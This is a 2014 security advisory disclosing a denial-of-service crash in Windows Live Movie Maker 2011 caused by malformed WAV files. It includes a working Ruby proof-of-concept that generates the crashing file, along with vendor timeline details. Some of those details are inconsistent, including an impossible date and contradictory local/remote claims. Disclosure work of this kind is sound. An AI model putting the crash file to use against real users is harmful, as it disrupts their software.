1. Advisory Information
Title: Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.wordpress.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-10-10
Vendors contacted: Microsoft
Release mode: User release
2. Vulnerability Information
Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: 2013-4858
3. Summary
Microsoft Windows Live Movie maker is a inbuilt application in Windows 7 systems. It is used in simple scale video editing purposes.
4. Vulnerability Description
Microsoft Windows Live Movie Maker contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).
5. Vulnerable Packages
- Version 2011 (Build 15.4.53508.1109)
6. Credits
This bug was researched by Osanda Malith Jayathissa.
7. Proof of Concept
#!/usr/bin/env ruby #Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit #Version: Version 2011 (Build 15.4.53508.1109) #Tested on: Windows 7 Professional 32-bit SP1 #E-Mail: OsandaJayathissa@gmail.com #Exploit-Author: Osanda Malith Jayathissa #Video: https://www.youtube.com/watch?v=SBJYzSNdY6k # /!\ Auhor is not responsible for any damage you cause # Use this material for educational purposes only #This is just a simple crash not an exploitable bug #Twitter: @OsandaMalith #Date: 25 Decemeber 2013 #CVE: 2013-4858 begin dos =( "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+ "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+ "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+ "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") file = open("WindowsMovieMaker.wav","w") file.write(dos) file.close() puts "[+] Exploit created >> WindowsMovieMaker.wav" puts "[*] Open any image and Click add music and add our payload" puts "[~] by Osanda Malith" end #EOF
8. Report Timeline
2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: Confirms that is only a crash and not a exploitable bug.
2014-01-10: Public disclosure.
9. Disclaimer
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
10. References
[1] http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html